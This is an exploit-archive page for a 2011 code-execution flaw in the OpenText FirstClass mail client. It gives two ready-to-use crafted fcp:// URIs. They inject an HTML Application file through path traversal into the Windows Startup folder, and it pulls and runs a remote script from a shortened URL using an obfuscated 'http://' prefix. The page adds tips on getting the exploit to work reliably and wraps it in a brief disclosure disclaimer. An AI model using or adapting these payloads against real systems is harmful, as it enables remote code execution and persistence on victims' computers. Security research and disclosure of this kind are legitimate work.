[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : OpenText FirstClass Client v 11.005 Code Execution
# Published : 2011-04-12
# Author : Kyle Ossinger
# Previous Title : Cisco Security Agent Management Console ‘st_upload
# Next Title : Adobe Flash Player SWF Memory Corruption Vulnerability

# Exploit Title: OpenText FirstClass Client (Delayed) Code Executiion# Date: Discovered 11/16/2010, Contacted OpenText 2/1/11 and 2/7/11,Released 4/11/2011# Author: Kyle Ossinger (www.k0ss.net)# Email: security@k0ss.net# Software Link:http://www3.firstclass.com/ClientDownloads/FC11ClientDownloadFiles/FC11005US.exe# Version: v.11 and lower, but will probably work on newer versionsonce they are released# Tested on: Windows XP, Vista, 7# CVE : none, no response from MITRE about thisDISCLAIMER--------------------I contacted OpenText about this issue twice over the period of a fewweeks and they never responded.  This is why I'm releasing the exploitnow; so it has a better chance of being patched.I take no responsibility for how anyone uses the followinginformation.  I only hope this helps the exploit developers thinkoutside the box of overflow exploits in executable programs.  Anytesting of the following information should be used in an isolatednetwork using a FirstClass server that you own and operate or havepermission to try this out on.ABOUT-----------This is an implementation flaw, not your usual buffer overflow/heapoverflow/format string exploit.By getting a victim to click on a specially crafted link in theFirstClass mail client, an attacker can place an executable file onthe victim's computer which will be executed upon the next systemreboot.The way it works is that you can make a URI to create a settings filefor the user to use, by crafting it as such:fcp://username:password(optional)@servername.tld;settingsfilename.fcWhatever you put into username and servername gets put into thesettings file as plain-text, so that is how I inject some code.  Younormally can't change the file extension though (seen at the end ofthe URI), but after a lot of tinkering I found that if you make theURI try to access a path inside of the firstclass server, you (forsome reason) CAN change the file extension.  Since I had to injectsome commands into this file to make it execute code, but it issurrounded by junk characters that would break any compiled executableor even batch scripts, I knew I'd have to use an HTML Application(HTA) file, which does indeed work wonderfully.THE EXPLOIT URI---------------------------The following URI will add the executable file to the startup programsdirectory of every user on the computer, given that the current userhas write access to the All Users directory on windows.  An attackerwould only use this if he or she were certain that the victim user isan Administrator on his or her computer.fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<bodyonload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cAll%20Users%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehtaThe following URI will add that same executable file to the CURRENTUSER's startup programs directory, but maybe afterwards the attackercould launch some privilege escalation exploits to get the desiredaccess.fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<bodyonload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehtaIf you want to understand more of how this exploit works please checkout www.k0ss.net, but if you just want to know the basic idea of howit works these basics will have to suffice.The <script src=> needs to point to your javascript file which usesonly javascript that WSH can understand.  Also, the URL pointing toyour script file must be made into a small URL in order to fit sizeconstraints.  Make sure to strip off the "http://" part from thescript URL as well, as it would break the exploit.NOTE: The URI can be a bit finicky when trying to put it into abookmark/link on FirstClass.  It usually adds 2 random CRLFcharacters, and gets rid of the 'a' in "hta".  You can correct thisand hit Ok again, and it will look normal again and work.  It's justsomething to check if it isn't working on your test machine.A complete write-up on how this particular exploit works can be viewedat www.k0ss.net